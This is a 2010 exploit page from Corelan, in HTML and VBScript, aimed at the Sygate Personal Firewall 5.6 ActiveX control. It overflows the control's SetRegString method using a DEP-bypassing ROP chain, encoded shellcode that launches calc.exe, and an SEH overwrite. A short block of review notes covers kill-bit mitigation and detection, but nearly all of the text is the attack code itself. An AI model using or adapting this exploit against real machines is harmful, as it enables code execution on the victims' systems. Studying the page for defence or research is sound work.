<html> <!-- |------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--| # Software: Sygate Personal Firewall 5.6 build 2808 ActiveX w/ DEP bypass # Author: Lincoln # Date : June 11, 2010 # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-050 # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. 
# Review notes (defensive context; the code below is kept exactly as published):
# - The page is a public PoC against the ActiveX control with CLSID D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9,
#   reached through its SetRegString method: the third argument (arg3) carries the ROP chain, the
#   Alpha2-encoded calc.exe payload, filler and the SEH overwrite, so that control/method is the attack surface.
# - Mitigation on hosts that still have this control: set the ActiveX kill bit for that CLSID (or remove
#   the control) and keep DEP enabled; the ROP chain exists because DEP alone did not stop the exploit.
# - Detection: web content instantiating this CLSID via <object classid=...> and calling SetRegString with
#   an oversized string argument is a strong indicator; the bad-character range below (80-9f) and the
#   Msf Alpha2 encoder note explain why the payload bytes stay in the printable range.
# - As rendered here the listing has lost its line breaks, so each VBScript ' comment swallows the statements
#   that followed it; treat this text as a historical record of the advisory rather than a runnable script.
# # # Bad Chars: 80-9f (makes for extra fun) # Tested on IE 7/6 , nop slide used # # --> <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' ></object> <script language='vbscript'> seh = unescape("%13%16%47%06") '#ADD ESP,46C # RETN rop = rop + String(72, "D") '#Junk rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop rop = rop + unescape("%19%16%47%06") '#Nop '#edx rop = rop + unescape("%33%b6%44%06") '#POP EBP # RETN rop = rop + unescape("%01%c0%4b%06") rop = rop + unescape("%65%b9%47%06") '#MOV EDX,EBP # POP REGISTERS CHAIN #RETN '#alignment rop = rop + unescape("%7c%bd%47%06") '#POP data into registers rop = rop + unescape("%49%50%45%06") rop = rop + unescape("%41%41%41%41") rop = rop + unescape("%ff%ff%ff%ff") rop = rop + unescape("%50%50%50%50") '#ebx rop = rop + unescape("%b2%7d%48%06")'#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") '#Junk rop = rop + unescape("%b2%7d%48%06")'#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") '#Junk rop = rop + unescape("%b2%7d%48%06")'#ADD EAX,80 # POP EBP # RETN rop = rop + unescape("%41%41%41%41") '#Junk rop = rop + unescape("%d9%c4%47%06") '#ADD EBX,EAX # PUSH 1 # POP EAX # RETN '#ebp rop = rop + unescape("%dd%c4%47%06") '#POP EAX # RETN rop = rop + unescape("%1f%73%d0%cc") rop = rop + unescape("%ae%f5%47%06")'#SUB EAX,ECX # RETN rop = rop + unescape("%30%14%45%06") '#MOV EBP,EAX # CALL ESI '#esi rop = rop + unescape("%22%cd%46%06") '#POP ESI # RETN rop = rop + unescape("%ff%ff%ff%ff") '#eax rop = rop + unescape("%dd%c4%47%06") '#POP EAX # RETN rop = rop + unescape("%63%72%d0%cc") rop = rop + unescape("%ae%f5%47%06")'#SUB EAX,ECX # RETN '#game over rop = rop + unescape("%47%71%49%06") '#PUSHAD (throw it all on the stack baby!) 
'[*] Using Msf::Encoder::Alpha2 with final size of 338 bytes cmd=calc.exe sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _ unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _ unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _ unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _ unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _ unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _ unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _ unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _ unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _ unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _ unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _ unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _ unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _ unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _ unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _ unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _ unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _ unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _ unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _ unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _ unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _ unescape("%70%45") junk= String(2814, "D") '3128 mjunk = String(25000, "A") arg1=1 arg2=1 arg3= rop + sc + junk + seh + mjunk arg4="defaultV" arg5="defaultV" target.SetRegString arg1 ,arg2 ,arg3 ,arg4 ,arg5 </script> <b><center>Sygate Personal Firewall 5.6 build 2808 ActiveX exploit w/ DEP bypass</b></center> </html> |